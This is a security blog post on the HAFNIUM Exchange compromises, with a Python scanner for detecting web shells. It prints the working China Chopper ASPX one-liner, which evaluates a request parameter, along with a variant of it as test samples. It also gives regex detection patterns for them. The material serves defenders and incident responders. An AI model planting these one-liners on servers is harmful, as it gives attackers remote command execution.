SoonSec
2 min read · Mar 9, 2021

Microsoft Exchange HAFNIUM

How companies running on-premises Exchange servers are being hacked

The Microsoft Threat Intelligence Center announced a security threat targeting companies that run on-premises Microsoft Exchange servers. Over the past two months, the HAFNIUM group hacked as many as 30,000 organizations, a figure that doubled to over 60,000 as of last weekend. This led Microsoft to speak publicly about the attack so that affected organizations could respond.

Microsoft has already released patches for the vulnerabilities, but a patch does not remove an attacker who got in before it was applied. What follows is some information on how to tell whether your server has been compromised.

According to Chris Krebs, if you are running an OWA (Outlook Web Access) server exposed to the internet, you should check for the presence of eight-character .aspx files in `C:\inetpub\wwwroot\aspnet_client\system_web\`.

Basically, the attacker keeps access to the server through a web shell: a small .aspx script dropped inside the web server's own folders. A script file sitting in a web root does not look out of place on its own, which is why antivirus software tends not to flag it, and why its mere presence is not much of a deterrent. Keep in mind, however, that it is the content of the file that is dangerous.

Here is an example of the shell content you can look for if you suspect anything:

```html
http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script>
```

This is what has been found inside those web shells. The `http://f/` prefix is just padding; the `<script runat="server">` block is the shell, and it is a one-liner that was first documented back in 2013 under the name "China Chopper web shell": whatever the attacker sends in the named request parameter (here `NO9BxmCXw0JE`, which acts as the shell's password) is handed straight to `eval`. For those who are interested, here is the article that explains how those web shells work:

Once the shell is in place, the attacker has remote command execution on the server. The initial intrusion used a zero-day exploit, meaning the vulnerability was being exploited in the wild before it was publicly known and patched.
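To turn the two checks above into something repeatable, here is a small scanner that combines the filename heuristic (eight-character .aspx files under `aspnet_client\system_web`) with a content signature for the China Chopper one-liner. This is an added example written for this post, not code from the original article or from the GitHub project it links to; it builds a constructed, throwaway directory with made-up file names and contents so it can be run offline, and it can also be pointed at a real folder (or a copy of the web root collected for triage) by passing the path as an argument.

```python
from __future__ import annotations

import os
import re
import sys
import tempfile
from pathlib import Path

# Default location from the post; any other directory can be passed instead.
DEFAULT_SCAN_ROOT = r"C:\inetpub\wwwroot\aspnet_client\system_web"

# Filename heuristic from the post: eight alphanumeric characters plus .aspx.
EIGHT_CHAR_ASPX = re.compile(r"^[A-Za-z0-9]{8}\.aspx$", re.IGNORECASE)

# Content signature: a server-side script block that evals a request
# parameter with "unsafe", i.e. the China Chopper one-liner quoted above.
# The parameter name (the attacker's password) varies, so it is a wildcard.
CHINA_CHOPPER_ASPX = re.compile(
    r'runat\s*=\s*["\']server["\'].*?'
    r'eval\s*\(\s*Request\s*\[\s*["\'][^"\']+["\']\s*\]\s*,\s*["\']unsafe["\']\s*\)',
    re.IGNORECASE | re.DOTALL,
)

# Weaker fallback: any eval() over request data in a script file is suspicious
# even when the exact one-liner is not present.
EVAL_REQUEST = re.compile(r"eval\s*\(\s*Request", re.IGNORECASE)

# Extensions whose content is inspected (a choice made for this example).
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp"}


def classify_file(path: Path) -> list[str]:
    """Return the reasons this file is suspicious (empty list if none)."""
    reasons: list[str] = []
    if EIGHT_CHAR_ASPX.match(path.name):
        reasons.append("eight-character .aspx filename")
    if path.suffix.lower() in SCRIPT_EXTENSIONS:
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            return reasons
        if CHINA_CHOPPER_ASPX.search(text):
            reasons.append("China Chopper eval(Request[...], 'unsafe') one-liner")
        elif EVAL_REQUEST.search(text):
            reasons.append("eval() over request data")
    return reasons


def scan(root: str | os.PathLike) -> dict[str, list[str]]:
    """Walk root recursively and map each suspicious file path to its reasons."""
    findings: dict[str, list[str]] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            reasons = classify_file(path)
            if reasons:
                findings[str(path)] = reasons
    return findings


def build_sample_tree() -> Path:
    """Create a constructed directory standing in for system_web.
    Every file name and content below is made up for this example."""
    root = Path(tempfile.mkdtemp(prefix="system_web_"))
    samples = {
        # Same shape as the shell quoted in the post (parameter name changed):
        # flagged on both the file name and the content.
        "Ab1cD2eF.aspx": (
            'http://f/<script language="JScript" runat="server">'
            'function Page_Load(){eval(Request["X9qLm2Pz7Kd1"],"unsafe");}'
            "</script>"
        ),
        # Eight-character name but harmless content: the name heuristic alone
        # is a false positive here, so the content is what decides.
        "supp0rt1.aspx": '<%@ Page Language="C#" %><html><body>Support</body></html>',
        # Ordinary name, ordinary page: nothing to report.
        "default.aspx": '<%@ Page Language="C#" %><html><body>Hello</body></html>',
        # Variant that evals request data without the "unsafe" flag.
        "help.aspx": (
            '<script runat="server">void Page_Load(){'
            'eval(Request.Form["cmd"]);}</script>'
        ),
    }
    for name, content in samples.items():
        (root / name).write_text(content, encoding="utf-8")
    return root


def demo() -> dict[str, list[str]]:
    """Scan the constructed tree and key the findings by file name."""
    root = build_sample_tree()
    return {Path(p).name: reasons for p, reasons in scan(root).items()}


if __name__ == "__main__":
    # With a path argument, scan that folder; otherwise run the demo tree.
    results = scan(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for name, reasons in sorted(results.items()):
        print(f"{name}: {'; '.join(reasons)}")
```

On the demo tree the scanner reports three files: the look-alike shell (name and content), the benign eight-character file (name only, which is exactly the false positive the post warns about), and the `Request.Form` variant (content only). Treat a name-only hit as something to open and read, and a content hit as something to preserve for forensics before removing it.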

We are including a link to this GitHub project so you can scan your servers for any unwanted web shells. The project is updated frequently, so keep scanning your system if you are worried:

Written by SoonSec. Penetration tester, security enthusiast.